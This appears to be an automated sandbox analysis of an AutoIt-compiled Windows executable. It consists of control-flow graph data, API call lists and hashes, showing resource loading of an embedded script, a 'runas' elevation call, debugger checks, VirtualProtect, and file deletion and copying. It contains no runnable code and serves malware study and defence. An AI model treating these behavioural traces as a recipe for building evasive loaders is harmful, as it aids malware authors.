calls 99438->99441 99439->99438 99440 4679c5 99439->99440 99442 4679e0 99440->99442 99443 49ef32 99440->99443 99447 4679e8 _memmove 99441->99447 99455 468087 59 API calls Mailbox 99442->99455 99445 468189 59 API calls 99443->99445 99446 49ef3c 99445->99446 99448 480ff6 Mailbox 59 API calls 99446->99448 99447->98970 99449 49ef5c 99448->99449 99451 467f06 99450->99451 99453 467ef9 99450->99453 99452 480ff6 Mailbox 59 API calls 99451->99452 99452->99453 99453->98964 99454->98986 99455->99447 99575 467dbf __wsetenvp 99574->99575 99576 468189 59 API calls 99575->99576 99577 467dd0 _memmove 99575->99577 99578 49f130 _memmove 99576->99578 99577->99115 99580 469997 84 API calls 99579->99580 99581 4dce2e 99580->99581 99604 4dce75 Mailbox 99581->99604 99617 4ddab9 99581->99617 99583 4dd0cd 99584 4dd242 99583->99584 99588 4dd0db 99583->99588 99667 4ddbdc 92 API calls Mailbox 99584->99667 99587 4dd251 99587->99588 99590 4dd25d 99587->99590 99630 4dcc82 99588->99630 99589 469997 84 API calls 99608 4dcec6 Mailbox 99589->99608 99590->99604 99595 4dd114 99645 480e48 99595->99645 99598 4dd12e 99651 4ca0b5 89 API calls 4 library calls 99598->99651 99599 4dd147 99652 46942e 99599->99652 99602 4dd139 GetCurrentProcess TerminateProcess 99602->99599 99604->98602 99608->99583 99608->99589 99608->99604 99649 4cf835 59 API calls 2 library calls 99608->99649 99650 4dd2f3 61 API calls 2 library calls 99608->99650 99609 4dd2b8 99609->99604 99613 4dd2cc FreeLibrary 99609->99613 99610 4dd17f 99664 4dd95d 107 API calls _free 99610->99664 99613->99604 99616 4dd190 99616->99609 99665 468ea0 59 API calls Mailbox 99616->99665 99666 469e9c 60 API calls Mailbox 99616->99666 99668 4dd95d 107 API calls _free 99616->99668 99618 467faf 59 API calls 99617->99618 99619 4ddad4 CharLowerBuffW 99618->99619 99669 4bf658 99619->99669 99623 4677c7 59 API calls 99624 4ddb0d 99623->99624 99625 4679ab 59 API calls 99624->99625 99626 4ddb24 99625->99626 99627 467e8c 59 API calls 99626->99627 99628 4ddb30 Mailbox 
99627->99628 99629 4ddb6c Mailbox 99628->99629 99676 4dd2f3 61 API calls 2 library calls 99628->99676 99629->99608 99631 4dcc9d 99630->99631 99635 4dccf2 99630->99635 99632 480ff6 Mailbox 59 API calls 99631->99632 99634 4dccbf 99632->99634 99633 480ff6 Mailbox 59 API calls 99633->99634 99634->99633 99634->99635 99636 4ddd64 99635->99636 99637 4ddf8d Mailbox 99636->99637 99644 4ddd87 _strcat _wcscpy __wsetenvp 99636->99644 99637->99595 99638 469cf8 59 API calls 99638->99644 99639 469d46 59 API calls 99639->99644 99640 469c9c 59 API calls 99640->99644 99641 469997 84 API calls 99641->99644 99642 48594c 58 API calls _W_store_winword 99642->99644 99644->99637 99644->99638 99644->99639 99644->99640 99644->99641 99644->99642 99679 4c5b29 61 API calls 2 library calls 99644->99679 99646 480e5d 99645->99646 99647 480ef5 VirtualProtect 99646->99647 99648 480ec3 99646->99648 99647->99648 99648->99598 99648->99599 99649->99608 99650->99608 99651->99602 99653 469436 99652->99653 99654 480ff6 Mailbox 59 API calls 99653->99654 99655 469444 99654->99655 99656 469450 99655->99656 99680 46935c 59 API calls Mailbox 99655->99680 99658 4691b0 99656->99658 99681 4692c0 99658->99681 99660 4691bf 99661 480ff6 Mailbox 59 API calls 99660->99661 99662 46925b 99660->99662 99661->99662 99662->99616 99663 468ea0 59 API calls Mailbox 99662->99663 99663->99610 99664->99616 99665->99616 99666->99616 99667->99587 99668->99616 99670 4bf683 __wsetenvp 99669->99670 99673 4bf6b8 99670->99673 99674 4bf769 99670->99674 99675 4bf6c2 99670->99675 99673->99675 99677 467a24 61 API calls 99673->99677 99674->99675 99678 467a24 61 API calls 99674->99678 99675->99623 99675->99628 99676->99629 99677->99673 99678->99674 99679->99644 99680->99656 99682 4692c9 Mailbox 99681->99682 99683 49f5c8 99682->99683 99688 4692d3 99682->99688 99684 480ff6 Mailbox 59 API calls 99683->99684 99686 49f5d4 99684->99686 99685 4692da 99685->99660 99688->99685 99689 469df0 59 API calls Mailbox 99688->99689 99689->99688 99691 4c3e7a 
Control-flow graph edge list (raw node/edge data for the graph image; omitted here). The nodes it names inside the 0x460000 image are the AutoIt runtime's CRT start-up and script-host routines, resolving to these APIs: FindFirstFileW, FindClose, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetModuleFileNameW, GetFullPathNameW, GetStartupInfoW, GetProcessHeap, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, InitializeCriticalSectionAndSpinCount, LeaveCriticalSection, TlsAlloc, TlsSetValue, GetCurrentThreadId, GetStdHandle, GetFileType, HeapAlloc, DecodePointer, EncodePointer, IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsThemeActive, SystemParametersInfoW, GetCurrentDirectoryW, MessageBoxA, GetSystemTimeAsFileTime, VariantClear, GetLastError, CloseHandle, ReadFile, SetFilePointerEx, MultiByteToWideChar, CharUpperBuffW and Sleep. A separate cluster of nodes at 0x10fda80, 0x10fb6d0, 0x10fd970 and 0x10feb30 lies outside the mapped image and resolves only to Sleep and GetPEB.

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00463B7A
• IsDebuggerPresent.KERNEL32 ref: 00463B8C
• GetFullPathNameW.KERNEL32(00007FFF,?,?,005262F8,005262E0,?,?), ref: 00463BFD
  • Part of subcall function 00467D2C: _memmove.LIBCMT ref: 00467D66
  • Part of subcall function 00470A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00463C26,005262F8,?,?,?), ref: 00470ACE
• SetCurrentDirectoryW.KERNEL32(?), ref: 00463C81
• MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,005193F0,00000010), ref: 0049D4BC
• SetCurrentDirectoryW.KERNEL32(?,005262F8,?,?,?), ref: 0049D4F4
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00515D40,005262F8,?,?,?), ref: 0049D57A
• ShellExecuteW.SHELL32(00000000,?,?), ref: 0049D581
  • Part of subcall function 00463A58: GetSysColorBrush.USER32(0000000F), ref: 00463A62
  • Part of subcall function 00463A58: LoadCursorW.USER32(00000000,00007F00), ref: 00463A71
  • Part of subcall function 00463A58: LoadIconW.USER32(00000063), ref: 00463A88
  • Part of subcall function 00463A58: LoadIconW.USER32(000000A4), ref: 00463A9A
  • Part of subcall function 00463A58: LoadIconW.USER32(000000A2), ref: 00463AAC
  • Part of subcall function 00463A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00463AD2
  • Part of subcall function 00463A58: RegisterClassExW.USER32(?), ref: 00463B28
  • Part of subcall function 004639E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00463A15
  • Part of subcall function 004639E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00463A36
  • Part of subcall function 004639E7: ShowWindow.USER32(00000000,?,?), ref: 00463A4A
  • Part of subcall function 004639E7: ShowWindow.USER32(00000000,?,?), ref: 00463A53
  • Part of subcall function 004643DB: _memset.LIBCMT ref: 00464401
  • Part of subcall function 004643DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 004644A6
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
• String ID: This is a third-party compiled AutoIt script.$runas$%O
• API String ID: 529118366-1310891252
• Opcode ID: de8cdb123d8d74d939063bb0bf197b5b1f5dc238dbf9903b70bf5defa03c506a
• Instruction ID: 9827e058ce058d74cb4f41b93b0e3bbb2b1772afaf0c7195f88f4faaa1ea7dc9
• Opcode Fuzzy Hash: de8cdb123d8d74d939063bb0bf197b5b1f5dc238dbf9903b70bf5defa03c506a
• Instruction Fuzzy Hash: 76512A35D04288EADF11EFB1DC45DEE7F74AF55308B00407BF81166292EA78564AD72B

Control-flow Graph (rendered image not recovered): basic blocks 464fe9-465001 (CreateStreamOnHGlobal), 465003-46501a (FindResourceExW), 49dd5c-49dd6b (LoadResource), 49dd71-49dd7f (SizeofResource), 49dd85-49dd90 (LockResource), 49dd96-49ddb4; exit via 465020 and 465021-465026.
APIs
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00464EEE,?,?,00000000,00000000), ref: 00464FF9
• FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00464EEE,?,?,00000000,00000000), ref: 00465010
• LoadResource.KERNEL32(?,00000000,?,?,00464EEE,?,?,00000000,00000000,?,?,?,?,?,?,00464F8F), ref: 0049DD60
• SizeofResource.KERNEL32(?,00000000,?,?,00464EEE,?,?,00000000,00000000,?,?,?,?,?,?,00464F8F), ref: 0049DD75
• LockResource.KERNEL32(NF,?,?,00464EEE,?,?,00000000,00000000,?,?,?,?,?,?,00464F8F,00000000), ref: 0049DD88
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: Resource$CreateFindGlobalLoadLockSizeofStream
• String ID: SCRIPT$NF
• API String ID: 3051347437-2107461305
• Opcode ID: c10911e3353f64e1e0a5b99f0df0bffbf1084b9651bc703a9ce25aa13386a674
• Instruction ID: 896ee832c28f03d4d34db81621604dac219b9b44baf343bdfe2d7d9b29dd442a
• Opcode Fuzzy Hash: c10911e3353f64e1e0a5b99f0df0bffbf1084b9651bc703a9ce25aa13386a674
• Instruction Fuzzy Hash: 6A117075200741BFD7218B65EC98F677BB9EBC9B11F20417DF505CA260EB72EC048665

Control-flow Graph (rendered image not recovered): entry block 464afe-464b5e (call 4677c7, GetVersionExW, call 467d2c); 464b73-464baa (call 467e8c, call 467886); 464bf1-464c08 (GetCurrentProcess, IsWow64Process); 464c20-464c30 and 464c32-464c3f (call 464c95); 464c41-464c45 (GetNativeSystemInfo); 464c4d-464c50 (FreeLibrary); 464c7d-464c87 and 464c89-464c93 (GetSystemInfo); remaining blocks in 464bb0-464c71 and 49db90-49dcbd carry no API calls.
APIs
• GetVersionExW.KERNEL32(?), ref: 00464B2B
  • Part of subcall function 00467D2C: _memmove.LIBCMT ref: 00467D66
• GetCurrentProcess.KERNEL32(?,004EFAEC,00000000,00000000,?), ref: 00464BF8
• IsWow64Process.KERNEL32(00000000), ref: 00464BFF
• GetNativeSystemInfo.KERNELBASE(00000000), ref: 00464C45
• FreeLibrary.KERNEL32(00000000), ref: 00464C50
• GetSystemInfo.KERNEL32(00000000), ref: 00464C81
• GetSystemInfo.KERNEL32(00000000), ref: 00464C8D
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
• String ID:
• API String ID: 1986165174-0
• Opcode ID: 0b9e53b2f0d86d27a7cec4b9fa2edd60ff14cbcb4c974e0e5c5e7751c06c67cb
• Instruction ID: 2b426e12eb1b80e608e27a9d20a68563e8952f13792381ba343686c9b6a11d82
• Opcode Fuzzy Hash: 0b9e53b2f0d86d27a7cec4b9fa2edd60ff14cbcb4c974e0e5c5e7751c06c67cb
• Instruction Fuzzy Hash: FC91B57194A7C4DECF31DB6885511ABBFE4AF66300B48496FD0CA57B01E228F948C76E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: BuffCharUpper
• String ID: prR$%O
• API String ID: 3964851224-4230680911
• Opcode ID: 18e00033d12e804178e768e4f9915436a99251645c4c5c74c744c6f164ba300f
• Instruction ID: cd88f884bdfba103cb29f853fdace8ce1716fa6de9cfb843f331278e69618226
• Opcode Fuzzy Hash: 18e00033d12e804178e768e4f9915436a99251645c4c5c74c744c6f164ba300f
• Instruction Fuzzy Hash: E0925774609341CFD724DF15C480B6BB7E1BB85308F14896EE88A8B352D7B9EC45CB9A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID:
• String ID: DtR$DtR$DtR$DtR$Variable must be of type 'Object'.
• API String ID: 0-3694267590
• Opcode ID: 3c9a166c27ee03925e96312bd3cfbbc6118039c5a8c1e0c437fd048adb695f4f
• Instruction ID: c99c67808c56763ac508ee8b0cf2f54a7311e478c9e1004d4332249e85ba3f61
• Opcode Fuzzy Hash: 3c9a166c27ee03925e96312bd3cfbbc6118039c5a8c1e0c437fd048adb695f4f
• Instruction Fuzzy Hash: B6A28F78A04205CFCB24CF59C480AAEB7F1FF59304F24805BE915AB351E779AD46CB9A
APIs
• GetFileAttributesW.KERNELBASE(?,0049E7C1), ref: 004C46A6
• FindFirstFileW.KERNELBASE(?,?), ref: 004C46B7
• FindClose.KERNEL32(00000000), ref: 004C46C7
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirst
• String ID:
• API String ID: 48322524-0
• Opcode ID: 888e338a90fdee0fbd6ba4ee5f60da6f5aace67b03ee65db4bf60563dbf668ba
• Instruction ID: 8434748be16112f294d8dd0812e849240e77bc161dc5b32c261c544f6f3b8979
• Opcode Fuzzy Hash: 888e338a90fdee0fbd6ba4ee5f60da6f5aace67b03ee65db4bf60563dbf668ba
• Instruction Fuzzy Hash: 3EE0D8359105005B42106738EC9D8EB775C9F46335F10076AFD35C11E0E7B85D54859E
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00470BBB
• timeGetTime.WINMM ref: 00470E76
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00470FB3
• TranslateMessage.USER32(?), ref: 00470FC7
• DispatchMessageW.USER32(?), ref: 00470FD5
• Sleep.KERNEL32(0000000A), ref: 00470FDF
• LockWindowUpdate.USER32(00000000,?,?), ref: 0047105A
• DestroyWindow.USER32 ref: 00471066
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00471080
• Sleep.KERNEL32(0000000A,?,?), ref: 004A52AD
• TranslateMessage.USER32(?), ref: 004A608A
• DispatchMessageW.USER32(?), ref: 004A6098
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004A60AC
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                                                                                                                                                            • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$prR$prR$prR$prR
                                                                                                                                                                            • API String ID: 4003667617-1203703131
                                                                                                                                                                            • Opcode ID: e1ab7b5bd32d377466e750f1839285c3496d7f87a7c0c31d4a78978dc62351b1
                                                                                                                                                                            • Instruction ID: 6251d9f0c581585ce7535be803a8cebb42260b831dc644673e2aa3a4b8fff6bb
                                                                                                                                                                            • Opcode Fuzzy Hash: e1ab7b5bd32d377466e750f1839285c3496d7f87a7c0c31d4a78978dc62351b1
                                                                                                                                                                            • Instruction Fuzzy Hash: 50B2A070608741DFD724DF24C984BAAB7E4BF95308F14891FE489972A1DB78E845CB8B

                                                                                                                                                                            Control-flow Graph

APIs
  • Part of subcall function 004C91E9: __time64.LIBCMT ref: 004C91F3
  • Part of subcall function 00465045: _fseek.LIBCMT ref: 0046505D
• __wsplitpath.LIBCMT ref: 004C94BE
  • Part of subcall function 0048432E: __wsplitpath_helper.LIBCMT ref: 0048436E
• _wcscpy.LIBCMT ref: 004C94D1
• _wcscat.LIBCMT ref: 004C94E4
• __wsplitpath.LIBCMT ref: 004C9509
• _wcscat.LIBCMT ref: 004C951F
• _wcscat.LIBCMT ref: 004C9532
  • Part of subcall function 004C922F: _memmove.LIBCMT ref: 004C9268
  • Part of subcall function 004C922F: _memmove.LIBCMT ref: 004C9277
• _wcscmp.LIBCMT ref: 004C9479
  • Part of subcall function 004C99BE: _wcscmp.LIBCMT ref: 004C9AAE
  • Part of subcall function 004C99BE: _wcscmp.LIBCMT ref: 004C9AC1
• DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004C96DC
• _wcsncpy.LIBCMT ref: 004C974F
• DeleteFileW.KERNEL32(?,?), ref: 004C9785
• CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 004C979B
• DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004C97AC
• DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004C97BE
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
• String ID:
• API String ID: 1500180987-0
• Opcode ID: fb67fc5d51c08dc67f35d1cd9525f7920c43328603c1dc4550a04747d35b960a
• Instruction ID: cfd1facca5e6c2f35f64339caa1e96285fae988eb0c3de3ec2b6dc21e72ed7e9
• Opcode Fuzzy Hash: fb67fc5d51c08dc67f35d1cd9525f7920c43328603c1dc4550a04747d35b960a
• Instruction Fuzzy Hash: A2C13CB5E00219AACF61DF95CC85EDEB7BDAF44304F0040ABF609E6251EB749E448F69

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00463074
• RegisterClassExW.USER32(00000030), ref: 0046309E
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004630AF
• InitCommonControlsEx.COMCTL32(?), ref: 004630CC
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004630DC
• LoadIconW.USER32(000000A9), ref: 004630F2
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00463101
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: 815aba9f587fac54762102565acfd688a80165c3154215454f41aa75857cc277
• Instruction ID: 1596107a584c9f4e351e71abbe629cbdfdbe1543a86bff86983de73afaccebde
• Opcode Fuzzy Hash: 815aba9f587fac54762102565acfd688a80165c3154215454f41aa75857cc277
• Instruction Fuzzy Hash: 21315CB1841344EFDB50CFA4D884AD9BBF0FF09310F14816EE580EA2A1D3B6458ACF55

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00463074
• RegisterClassExW.USER32(00000030), ref: 0046309E
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004630AF
• InitCommonControlsEx.COMCTL32(?), ref: 004630CC
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004630DC
• LoadIconW.USER32(000000A9), ref: 004630F2
• ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00463101
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: 3288fc7ec5aaef90049c2f3831acb8954302e366a9640e50300c6cf4ffe4b023
• Instruction ID: 3ebf342b2c5189ddf703f4bea364ffd74b8213349e75e951984f53e1868fac9e
• Opcode Fuzzy Hash: 3288fc7ec5aaef90049c2f3831acb8954302e366a9640e50300c6cf4ffe4b023
• Instruction Fuzzy Hash: C721F7B1900248EFDB10DFA4EC88B9DBBF4FB09700F00812AF510AA2A1D7B545499F95

Control-flow Graph

APIs
  • Part of subcall function 00464864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,005262F8,?,004637C0,?), ref: 00464882
  • Part of subcall function 0048074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,004672C5), ref: 00480771
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00467308
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0049ECF1
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0049ED32
• RegCloseKey.ADVAPI32(?), ref: 0049ED70
• _wcscat.LIBCMT ref: 0049EDC9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
Similarity
• API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
• String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
• API String ID: 2673923337-2727554177
                                                                                                                                                                            • Opcode ID: 40b29ba7155fbfcd2aa5db3f7af8b157bb73f115a912b57c16b626805ba73d09
                                                                                                                                                                            • Instruction ID: 79bd320e9fcffc72e579c4c7698ace422e699595d6924464de5a730418cb398c
                                                                                                                                                                            • Opcode Fuzzy Hash: 40b29ba7155fbfcd2aa5db3f7af8b157bb73f115a912b57c16b626805ba73d09
                                                                                                                                                                            • Instruction Fuzzy Hash: 41718D75008305DEC724EF26EC8196BBBE8FFA9704F40092FF445832A1EB349949DB5A

Control-flow Graph: interactive graph not reproduced; the executed and not-executed basic blocks span 00463633-0049D3A9 and call DefWindowProcW, PostQuitMessage, SetTimer, RegisterWindowMessageW, CreatePopupMenu, KillTimer, MoveWindow and SetFocus.
APIs
• DefWindowProcW.USER32(?,?,?,?), ref: 004636D2
• KillTimer.USER32(?,00000001), ref: 004636FC
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0046371F (uElapse 000002EE = 750 ms)
• RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0046372A
• CreatePopupMenu.USER32 ref: 0046373E
• PostQuitMessage.USER32(00000000), ref: 0046375F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
• Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmp
